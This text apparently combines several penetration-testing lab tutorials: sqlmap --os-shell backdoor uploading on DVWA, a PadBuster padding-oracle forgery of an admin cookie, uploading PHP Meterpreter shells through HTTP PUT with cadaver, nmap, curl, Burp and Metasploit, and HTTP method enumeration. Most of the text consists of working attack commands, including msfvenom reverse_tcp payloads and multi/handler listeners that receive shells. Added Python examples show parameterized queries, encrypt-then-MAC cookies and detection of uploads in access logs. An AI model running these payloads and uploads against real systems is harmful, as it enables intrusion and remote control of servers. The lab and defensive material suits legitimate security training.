Meterpreter Shell Uploading in DVWA with SQL Injection

This article follows the same approach as the previous one; today I will use sqlmap to upload a backdoor file into a DVWA installation suffering from an SQL injection vulnerability.

Requirements:
Xampp/Wamp Server
DVWA Lab
Kali Linux: Burp suite, sqlmap tool

First you need to install the DVWA lab on your XAMPP or WAMP server; read the full article here.
Now open DVWA on your PC and log in with the following credentials:

Username – admin
Password – password

Click on DVWA Security and set the website security level to low.

From the list of vulnerabilities select SQL Injection for your attack. Type User ID: 1 in the text box. Don't click the submit button before setting the browser proxy; set your browser proxy so that Burp Suite works properly.


Turn on Burp Suite, click on Proxy in the menu bar and switch Intercept on. Come back and click the submit button in DVWA. The Intercept function displays the HTTP and WebSocket messages that pass between your browser and web servers. Burp Suite shows the "Cookie" and "Referer" headers in the captured data; these are used later in the sqlmap commands.


Next, sqlmap analyses the URL to establish a connection to the target and then uses SQL queries, sent with the given cookie, to fetch the names of all databases.

sqlmap -u "http://192.168.0.102/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=jg6ffoh1j1n6pc1ea0ovma5q47; security_level=0" --dbs


As you can see in the image below, it has dumped the names of all databases. Choose dvwa to upload the PHP backdoor.


Now type the following command to run sqlmap and obtain an OS shell on the web server (dvwa):
sqlmap -u "http://192.168.0.102/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=jg6ffoh1j1n6pc1ea0ovmane47; security_level=0" -D dvwa --os-shell


It will try to generate a backdoor. I want to create a PHP backdoor on the target PC, therefore type 4 for the PHP payload and then type 4 again for a brute-force search for a writable directory to upload to.


It tries to upload the file to "/xampp/htdocs/" using different SQL injection techniques. As soon as the file is uploaded it prints the message "INFO: the file stager has been successfully uploaded on '/xampp/htdocs/'" and you get an OS shell on the victim PC. It also shows the path where you can manually upload your backdoor; look at the highlighted URL:

http://192.168.0.102/tmpunias.php


Open the URL http://192.168.0.102/tmpunais.php in the browser. From the screenshot you can read the heading of the web page, "sqlmap file uploader", which lets you browse for your backdoor on your machine and then uploads it to the directory "/xampp/htdocs/" of the web server (dvwa).


Let's prepare the malicious file to upload with msfvenom:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 -f raw

copy the code from 

Now load the Metasploit framework by typing msfconsole and start multi/handler.


Click on Browse to select your shell.php file and then click on Upload.


GREAT!!! Here it shows "Admin File is uploaded", which means the backdoor shell.php has been uploaded.


To execute the backdoor on the target PC, open the URL 192.168.0.102/shell.php in the browser and you will receive a reverse connection at multi/handler.

msf> use multi/handler
msf exploit(handler) > set lport 4444
msf exploit(handler) > set lhost 192.168.0.104
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > exploit
meterpreter > sysinfo
Divine!!! The meterpreter session is opened.
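As an added illustration (not code from the article or from DVWA), the query shape DVWA's low-security SQLi page uses, rebuilt on an in-memory SQLite table with constructed rows, beside the parameterized form: in the vulnerable version a quote in id rewrites the query, which is the hole sqlmap detects and then drives its database enumeration and --os-shell upload through; the bound parameter closes it.

```python
import sqlite3

# Constructed stand-in for DVWA's users table (not DVWA's real data).
SAMPLE_USERS = [
    (1, "admin", "admin"),
    (2, "Gordon", "Brown"),
    (3, "Hack", "Me"),
]


def make_db():
    """In-memory SQLite stand-in for the dvwa database on the XAMPP host."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """DVWA 'low' style: the id parameter is pasted straight into the SQL text, so a
    quote in the input changes the statement instead of being treated as data."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '%s'" % user_id
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    """Hardened form: the value travels as a bound parameter, never as SQL text."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def demo():
    """Run both lookups with a normal id and with a tautology probe; return the rows."""
    conn = make_db()
    normal = "1"
    tautology = "1' OR '1'='1"  # the classic probe: makes the WHERE clause true for every row
    return {
        "vuln_normal": lookup_vulnerable(conn, normal),
        "vuln_tautology": lookup_vulnerable(conn, tautology),
        "safe_normal": lookup_parameterized(conn, normal),
        "safe_tautology": lookup_parameterized(conn, tautology),  # no row: not a valid id
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

On the server side, sqlmap's --os-shell also depends on the database account holding MySQL's FILE privilege and on a web directory the database can write to; running the application under a low-privileged database user and setting secure_file_priv removes that upload path even if the injection itself goes unnoticed.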


Hack Padding Oracle Lab (CTF Challenge)

The main purpose of solving this lab was to share the padding oracle attack technique with our visitors.

A padding oracle attack enables an attacker to decrypt encrypted data without knowledge of the encryption key or the cipher used, by sending skilfully manipulated ciphertexts to the padding oracle and observing the results it returns. This causes a loss of confidentiality of the encrypted data; for example, in the case of session data stored on the client side, the attacker can gain information about the internal state and structure of the application. A padding oracle attack also enables an attacker to encrypt arbitrary plaintexts without knowledge of the key or cipher. If the application assumes that the integrity and authenticity of the decrypted data are guaranteed, an attacker could manipulate the internal session state and possibly gain higher privileges.


First you need to download the padding oracle lab from here. Now install the ISO image in VMware and start it.

Start Kali Linux as well and open the target IP 192.168.1.29 in the browser. At this point you need to create a user account, so click on the register option.


Now register a username with its password and then log in to exploit this vulnerability. I registered as raj:123.


Once you have created a user account, go to the login panel and at the same time use Burp Suite to capture the cookies.


Start Burp Suite and don't forget to set the manual proxy in your browser. Now open the Proxy tab and switch Intercept on to capture the request to the target. When this is done you will see the captured data in the intercept window. Here you can see that I try to log in with the credentials raj:123.


Now right-click in that window and a list of options appears; click on Send to Repeater. In the screenshot you can see two panels, left and right, for the request and the response respectively.
In the left panel send username raj and password 123 as the request; click on the Go button to forward this request, which generates an auth cookie in the response shown in the right panel.

Copy the highlighted cookie; it is used in the command below.


Next open a terminal and run the following command, which contains the target URL plus the cookie copied above:

padbuster http://192.168.1.102/login.php wJRTrRORayKbhI2aKPHxniQ6DEAHi7WG 8 --cookies auth=wJRTrRORayKbhI2aKPHxniQ6DEAHi7WG --encoding 0

python-paddingoracle is a Python implementation heavily based on PadBuster, an automated script for performing padding oracle attacks developed by Brian Holyfield of Gotham Digital Science. The above command decrypts the encrypted value of auth into plaintext. Type 2 when it asks for the ID (the recommended one).


The last part of the screenshot shows the decrypted value in three forms: Base64, HEX and ASCII. The auth cookie is a combination of the username and its password; from PadBuster we learn what the encrypted value for the user raj contains.


We are very near our goal: just encrypt the auth cookie once again with the user set to admin. Here our plaintext is user=admin and we encrypt it using PadBuster.

padbuster http://192.168.1.102/login.php wJRTrRORayKbhI2aKPHxniQ6DEAHi7WG 8 --cookies auth=wJRTrRORayKbhI2aKPHxniQ6DEAHi7WG --encoding 0 --plaintext user=admin
Again type 2 when it asks for the ID (the recommended one).


Here the highlighted part is our encrypted value for admin. Copy it: "BAit--------AAAA".


Go to Burp Suite once again and click on Params under the Intercept tab; it contains two fields, username and password. Now add a third field for the auth value: click the Add button on the right side of the frame, which adds another row to the params.


It has three columns: type, name and value. Paste the encrypted value obtained from PadBuster into these columns as type: cookie, name: auth, value: BAit------AAAAAA. Then click on Forward to send this request to the web server.

Click on Forward again to send it.


When Burp Suite sends the request to the web server, you are logged in as the admin account.
Congrats!!! We have met the goal of this lab.
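An added example (not part of the lab or of PadBuster) of why the lab's auth cookie can be forged and how to close the hole: a CBC cookie over a constructed toy 8-byte block cipher with PKCS#7 padding, checked the way the lab does (a padding error is reported differently from a valid decryption), beside an encrypt-then-MAC check that verifies an HMAC before the padding is ever examined. The keys, IV and toy cipher are constructed for illustration and are not the lab's.

```python
import hashlib, hmac

BLOCK = 8  # the lab's auth cookie uses 8-byte blocks (the "8" in the padbuster command)
ENC_KEY, MAC_KEY = b"constructed-demo-enc-key", b"constructed-demo-mac-key"  # not the lab's
IV = bytes(range(BLOCK))  # fixed IV so the example is reproducible

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# Toy 8-byte block cipher (4-round Feistel keyed via SHA-256), used only so CBC can be shown
# without a crypto library; it is not secure.
def block_encrypt(key, block):
    l, r = block[:4], block[4:]
    for i in range(4):
        l, r = r, _xor(l, hashlib.sha256(key + bytes([i]) + r).digest()[:4])
    return r + l

def block_decrypt(key, block):
    r, l = block[:4], block[4:]
    for i in reversed(range(4)):
        r, l = l, _xor(r, hashlib.sha256(key + bytes([i]) + l).digest()[:4])
    return l + r

def pad(data):  # PKCS#7
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")  # the failure a padding oracle leaks
    return data[:-n]

def cbc_encrypt(key, iv, plaintext):
    out, prev, data = b"", iv, pad(plaintext)
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, _xor(data[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, iv, ct):  # returns the still-padded plaintext
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out

def issue_cookie(plaintext):
    """Return (unauthenticated cookie, authenticated cookie): IV||ct and IV||ct||HMAC."""
    body = IV + cbc_encrypt(ENC_KEY, IV, plaintext)
    return body, body + hmac.new(MAC_KEY, body, hashlib.sha256).digest()

def vulnerable_check(cookie):
    """As in the lab: a padding failure is answered differently from a valid decryption."""
    try:
        pt = unpad(cbc_decrypt(ENC_KEY, cookie[:BLOCK], cookie[BLOCK:]))
    except ValueError:
        return "PADDING_ERROR"  # a distinguishable answer: one bit of plaintext per query
    return "OK:" + pt.decode("latin-1")

def hardened_check(cookie):
    """Encrypt-then-MAC: constant-time tag check over IV||ct before any padding is examined."""
    body, tag = cookie[:-32], cookie[-32:]
    if not hmac.compare_digest(hmac.new(MAC_KEY, body, hashlib.sha256).digest(), tag):
        return "INVALID"  # every tampered cookie gets this same uniform rejection
    return "OK:" + unpad(cbc_decrypt(ENC_KEY, body[:BLOCK], body[BLOCK:])).decode("latin-1")
```

Flipping one byte of the first ciphertext block changes the last padding byte of the cookie's final block, so the unauthenticated check answers PADDING_ERROR or OK depending on the modification, while the authenticated check answers INVALID either way.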

Multiple Ways to Exploit a PUT Vulnerability in a Web Server

Hi Friends, today's article is about exploiting the HTTP PUT method vulnerability through various techniques. First we determine whether the HTTP PUT method is enabled on the target machine, after which we use several different methods to upload a Meterpreter reverse shell to the target and compromise it.
Target: Metasploitable 2
Attacker: Kali Linux machine
The PUT method was originally intended as one of the HTTP methods used for file management operations. If the HTTP PUT method is enabled on the web server it can be used to upload a malicious resource to the target server, such as a web shell, and execute it.
As this method is used to change or delete files on the target server's file system, it often gives rise to file upload vulnerabilities, leading the way to critical and dangerous attacks. As a best practice, if the organization absolutely MUST have these methods enabled, the file access permissions on its critical servers should be strictly limited, with access restricted to authorized users.
Note: In this tutorial we are using a vulnerable target machine for pentesting purposes and to illustrate the use of various tools. This is purely meant for educational purposes in a testing environment and should not be used in a production environment without authorized permission from the relevant authorities/management.
Let’s Begin!!!!
Boot your Kali Linux machine (IP: 192.168.1.105) and, in parallel, type the victim IP 192.168.1.103 into the Firefox browser and click on WEBDAV. As we can see from the screenshot, it lists only the parent directory.
 


First of all we need to ensure that the vulnerable target machine has the HTTP PUT method enabled, so that we can upload malicious backdoors. To confirm this, we scan the target using Nikto.
Nikto is a popular web server scanner that tests web servers for dangerous files/CGIs, outdated server software and other issues. It also performs generic and server-type-specific checks. Below is the command to scan the URL:
nikto -h http://192.168.1.103/dav/
Upon running the above command, we observe that the highlighted part of the screenshot below shows that the HTTP PUT method is allowed. Now let's hack the vulnerable target machine by uploading a malicious PHP file using the various techniques shown in the upcoming sections.




Prepare the malicious file to be uploaded with msfvenom:
Msfvenom can be used to create a PHP meterpreter payload that gives us a reverse shell. Execute the following command:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.105 lport=4444 -f raw
Copy the code from and save it in a file with the .php extension, shell.php, on the desktop. This will be used in the upcoming sections to upload the file to the web server.




In parallel, load the Metasploit framework by typing msfconsole in a new terminal and start multi/handler. This will be used later in the section.
Cadaver
Cadaver is a command-line tool pre-installed on the Kali machine that enables uploading and downloading files over WebDAV.
Type the target host URL to upload the malicious file, using the command given below.
cadaver http://192.168.1.103/dav/
Now, once we are inside the victim's directory, upload the file shell.php from the Desktop to the target machine's path by executing the command below:
put /root/Desktop/shell.php



To verify whether the file was uploaded, open the URL 192.168.1.103/dav/ in the browser. Awesome!!! As we can see, the malicious file shell.php has been uploaded to the web server.


Now let's launch the Metasploit framework and start a handler using the exploit/multi/handler module. Set the other values, LHOST and LPORT, to the Kali machine's IP and the port to listen on respectively. Once done, run the command exploit to start listening for incoming connections.

msf> use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.105
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit

Press Enter and we observe that the reverse TCP handler has started on the Kali IP 192.168.1.105:4444.
Now go back to the previously uploaded shell.php file and click on it. Once it runs, we automatically get a reverse TCP connection in the meterpreter shell. Then run the sysinfo command in the meterpreter session to get the machine's OS and architecture details.
meterpreter > sysinfo



NMAP
Nmap is an open-source port scanner and network exploration tool. If the PUT method is enabled on a web server, we can also upload a malicious file to the remote web server with the help of Nmap. Below is the command to do this; we must specify the filename and URL path as NSE script arguments. In parallel, prepare the malicious file nmap.php to upload to the target server.
nmap -p 80 192.168.1.103 --script http-put --script-args http-put.url='/dav/nmap.php',http-put.file='/root/Desktop/nmap.php'
As seen in the screenshot below, the nmap.php file has been uploaded successfully.




Open the same URL 192.168.1.103/dav in the browser. As evident from the screenshot, the file nmap.php has been uploaded to the web server.




Simultaneously, open the Metasploit console and use multi/handler; then go back to the previously uploaded nmap.php file and run it. As can be seen below, this gives us a meterpreter session.




Poster
Poster is a Firefox add-on and developer tool for interacting with web services; it lets the end user trigger HTTP requests such as GET, POST, PUT and DELETE and also allows setting the entity body and content type.
Prepare the malicious file poster.php that you would like to upload to the target machine. Install the Poster plug-in from Firefox Add-ons. Click on Tools in the menu bar and then click on Poster in the dropdown menu. The following dialog box opens. Type the URL as shown in the screenshot, provide the path of the malicious file to be uploaded via the Browse option and finally click on the PUT action.




Open the same URL 192.168.1.103/dav in the browser. As evident from the screenshot, the file poster.php has been uploaded to the web server.




Simultaneously, open the Metasploit console and use multi/handler; then go back to the previously uploaded poster.php file and run it. This gives us a meterpreter session.



Burpsuite
Burp Suite is one of the most popular proxy interception tools; its graphical interface can be used to analyse all kinds of GET and POST requests.
Configure the manual proxy settings of the browser so as to intercept the GET request. Browse to the URL http://192.168.1.103 but don't hit ENTER yet. In parallel, navigate to the Burp Suite Proxy tab and click Intercept is on under the Intercept sub-tab to capture the request. As soon as we hit ENTER in the browser, the data appears in the intercept window.
Now right-click in the same window and a list of options is displayed; click on Send to Repeater.




In the highlighted screenshot below we observe two panels, left and right, for the HTTP request and HTTP response respectively. The GET method can be seen in the HTTP request; we now replace GET with the PUT method in order to upload the file burp.php containing the malicious code.
Type PUT /dav/burp.php HTTP/1.1 in the header and then paste the malicious PHP code starting from



Verify and confirm the file upload by browsing to the same URL 192.168.1.103/dav in the browser; we can see that the burp.php file has been uploaded to the /dav directory of the web server.



Simultaneously, open the Metasploit console and use multi/handler; then go back to the previously uploaded burp.php file and run it. This gives us a meterpreter session.



Metasploit
Metasploit Framework is a well-known platform for developing, testing and executing exploits. It is an open-source tool for running various exploits against target machines. Its http_put module can abuse misconfigured web servers to upload and delete web content via PUT and DELETE HTTP requests. Set ACTION to either PUT or DELETE; PUT is the default.
Metasploit has built-in auxiliary modules dedicated to scanning HTTP methods and gives us the ability to PUT a file with auxiliary/scanner/http/http_put. Below are the commands to accomplish this:
msf > use auxiliary/scanner/http/http_put
msf auxiliary(http_put) > set rhosts 192.168.1.103
msf auxiliary(http_put) > set payload php/meterpreter/reverse_tcp
msf auxiliary(http_put) > set path /dav/
msf auxiliary(http_put) > set filename meter.php
msf auxiliary(http_put) > set filedata file://root/Desktop/meter.php
msf auxiliary(http_put) > exploit



Open the same URL 192.168.1.103/dav in the browser. As evident from the screenshot, the file meter.php has been uploaded to the web server.




Simultaneously, open the Metasploit console and use multi/handler; then go back to the previously uploaded meter.php file and run it. This gives us a meterpreter session.



cURL
cURL is a well-known command-line tool for sending or receiving data using URL syntax; it supports many well-known protocols (HTTPS, FTP, SCP, LDAP, Telnet etc.).
To exploit the PUT method with cURL, the command is:
curl http://192.168.1.103/dav/ --upload-file /root/Desktop/curl.php -v



Open the same URL 192.168.1.103/dav in the browser. As evident from the screenshot, the file curl.php has been uploaded to the web server.







Simultaneously, open the Metasploit console and use multi/handler; then go back to the previously uploaded curl.php file and run it. This gives us a meterpreter session.
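Added example (not from the article): a small access-log triage over constructed Apache combined-format lines modelled on the uploads above (a Nikto probe, then cadaver, nmap, Poster, curl, then the GET that runs shell.php). It flags every successful WebDAV write method, ranks uploads of executable extensions highest and raises a critical alert when an uploaded file is then requested. The log lines and user-agent strings are constructed, not captured from Metasploitable.

```python
import re

# Constructed Apache combined-format lines modelled on the uploads in this article.
# These are not real logs; the user agents are illustrative.
SAMPLE_LOG = """\
192.168.1.105 - - [10/Oct/2017:10:01:02 +0000] "OPTIONS /dav/ HTTP/1.1" 200 0 "-" "Mozilla/5.00 (Nikto/2.1.6)"
192.168.1.105 - - [10/Oct/2017:10:02:10 +0000] "PUT /dav/shell.php HTTP/1.1" 201 0 "-" "cadaver/0.23.3 neon/0.30.2"
192.168.1.105 - - [10/Oct/2017:10:03:15 +0000] "PUT /dav/nmap.php HTTP/1.1" 201 0 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine)"
192.168.1.105 - - [10/Oct/2017:10:04:20 +0000] "PUT /dav/poster.php HTTP/1.1" 201 0 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/52.0"
192.168.1.105 - - [10/Oct/2017:10:05:25 +0000] "PUT /dav/curl.php HTTP/1.1" 201 0 "-" "curl/7.55.1"
192.168.1.105 - - [10/Oct/2017:10:06:30 +0000] "GET /dav/shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/52.0"
192.168.1.50 - - [10/Oct/2017:10:07:00 +0000] "PUT /dav/notes.txt HTTP/1.1" 201 0 "-" "cadaver/0.23.3 neon/0.30.2"
192.168.1.50 - - [10/Oct/2017:10:08:00 +0000] "GET /index.php HTTP/1.1" 200 891 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# Methods that create, change or remove content on a WebDAV-enabled server.
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH"}
# Extensions the server would execute rather than serve as static files.
EXEC_EXT = (".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx", ".cgi", ".pl")


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_suspicious(log_text):
    """Triage: every successful (2xx) write-method request is an alert; uploads with an
    executable extension are 'high', other writes 'medium', and a later successful GET of
    a file uploaded with an executable extension is 'critical' (the shell was run)."""
    alerts, uploaded = [], set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["status"].startswith("2"):
            continue
        path = rec["path"]
        if rec["method"] in WRITE_METHODS:
            executable = path.lower().endswith(EXEC_EXT)
            alerts.append(("high" if executable else "medium", rec["ip"],
                           f'{rec["method"]} {path} via "{rec["ua"]}"'))
            if executable:
                uploaded.add(path)
        elif rec["method"] == "GET" and path in uploaded:
            alerts.append(("critical", rec["ip"], f"uploaded file {path} was requested"))
    return alerts


if __name__ == "__main__":
    for severity, ip, detail in find_suspicious(SAMPLE_LOG):
        print(f"[{severity:8}] {ip} {detail}")
```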

Penetration Testing of HTTP Protocol (Verb Tampering)

You are all very familiar with the HTTP protocol and its services. HTTP allows intermediate network elements to enable communication between clients and servers. HTTP is an application layer protocol designed within the framework of the Internet protocol suite.

List of Valid HTTP Request Methods

GET: a method used simply to retrieve data from the server or a specific resource. GET requests are used only to read data, not to alter it; they may return cached data, and the requests remain in the browser history.

POST: this method sends data to the server or resource. POST requests cannot be bookmarked; they have no limitation on data length, and the parameters are not saved in the browser history.

HEAD: the HEAD method is used to query only for information about a document, not for the document itself. HEAD is much faster than GET, as a much smaller amount of data is transferred.

PUT: PUT uploads a file or completely replaces whatever is available at the given URL with the client-supplied content. Attackers take advantage of this method.

DELETE: through the DELETE action a client (or an attacker) can remove a file from the server, which can cause a cascade and rollback of several transactions or messages and interrupt communication.

CONNECT: establishes a tunnel to provide a secure connection and communication between client and server, for example through HTTP proxies and SSL encryption.

OPTIONS: OPTIONS returns the HTTP methods that the server supports for the specified URL. It is used to describe the communication options for the target resource.

TRACE: this method simply echoes back to the client whatever string was sent to the server, and is used mainly for debugging purposes.

In this article we are going to perform HTTP verb tampering and find out which methods are allowed on the host server.

LET'S START!!!!
Boot up your Kali Linux and open a terminal to identify the verbs enabled on the host IP. I will perform the same task with different techniques.


Metasploit

Now type msfconsole in the terminal to load the Metasploit framework and use the following module to identify the supported options.

This module displays the available HTTP options for each system.
msf > use auxiliary/scanner/http/options
msf auxiliary(options) > set rhosts 192.168.1.43
msf auxiliary(options) > set rport 80
msf auxiliary(options) > exploit


Look at the highlighted part of the screenshot, which shows which HTTP methods are allowed (GET HEAD POST OPTIONS TRACE).


Curl

With curl you can identify the methods allowed on the target IP. Type the following command to run curl:
curl -v -X OPTIONS 192.168.1.43

The screenshot confirms that curl works properly, dumping the same result as above. The highlighted part shows which HTTP methods are allowed (GET HEAD POST OPTIONS TRACE).


NIKTO

Nikto is another tool that performs the same function and analyses the allowed HTTP methods. Execute the following command in the terminal once again to scan the target IP.

nikto -h 192.168.1.43

Pretty good!!! Look at the screenshot: the result is exactly the same as above (GET HEAD POST OPTIONS TRACE).


Nmap

The Nmap http-methods script finds out which options an HTTP server supports by sending an OPTIONS request.

nmap --script http-methods --script-args http-methods.test-all 192.168.1.43

Superb!!! Not only does it dump the allowed HTTP methods (GET HEAD POST OPTIONS TRACE CONNECT) but it also points out the potentially risky ones, i.e. TRACE and CONNECT.


Netcat

Connect to the victim through netcat; this also queries the victim and reveals the allowed methods.

nc 192.168.1.43 80

Hence the results from all six techniques are about the same: we have found that GET, HEAD, POST, OPTIONS and TRACE are the verbs allowed by the HTTP server.
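Added example (not from the article): the raw OPTIONS request the netcat step sends, a parser for the Allow header in the reply, and a classification of the returned methods against the risky ones the nmap output singles out. Both replies are constructed to match the results reported above for 192.168.1.43, not captured from a real host.

```python
# Reasons a method is worth flagging during a verb-tampering review.
RISKY = {
    "PUT": "creates or replaces files on the server",
    "DELETE": "removes files on the server",
    "TRACE": "echoes the request back; can expose headers and cookies",
    "CONNECT": "may turn the server into a tunnelling proxy",
    "MOVE": "WebDAV write method (rename)",
    "COPY": "WebDAV write method (duplicate)",
}
BASELINE = {"GET", "HEAD", "POST", "OPTIONS"}  # what a plain content server usually needs

# Constructed replies modelled on the results reported above for 192.168.1.43.
REPLY_OPTIONS = (b"HTTP/1.1 200 OK\r\nServer: Apache\r\n"
                 b"Allow: GET,HEAD,POST,OPTIONS,TRACE\r\nContent-Length: 0\r\n\r\n")
REPLY_TEST_ALL = b"HTTP/1.1 200 OK\r\nAllow: GET, HEAD, POST, OPTIONS, TRACE, CONNECT\r\n\r\n"


def options_request(host, path="/"):
    """The raw request typed after `nc host 80` (constructed here; not shown in the article)."""
    return f"OPTIONS {path} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n".encode()


def parse_allow(raw_reply):
    """Extract the method list from the Allow header (or the IIS-style Public header)."""
    head = raw_reply.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    for line in head.split("\r\n")[1:]:  # skip the status line
        name, _, value = line.partition(":")
        if name.strip().lower() in ("allow", "public"):
            return [m.strip().upper() for m in value.split(",") if m.strip()]
    return []


def assess(methods):
    """Split advertised methods into risky ones (with a reason) and ones outside BASELINE."""
    return {
        "allowed": methods,
        "risky": {m: RISKY[m] for m in methods if m in RISKY},
        "beyond_baseline": sorted(set(methods) - BASELINE),
    }


if __name__ == "__main__":
    print(options_request("192.168.1.43").decode(), end="")
    for reply in (REPLY_OPTIONS, REPLY_TEST_ALL):
        print(assess(parse_allow(reply)))
```

The Allow header is only the server's claim; nmap with test-all tries each method rather than trusting OPTIONS, which is why it can report methods such as CONNECT that the header omits, and a hardening check should do the same.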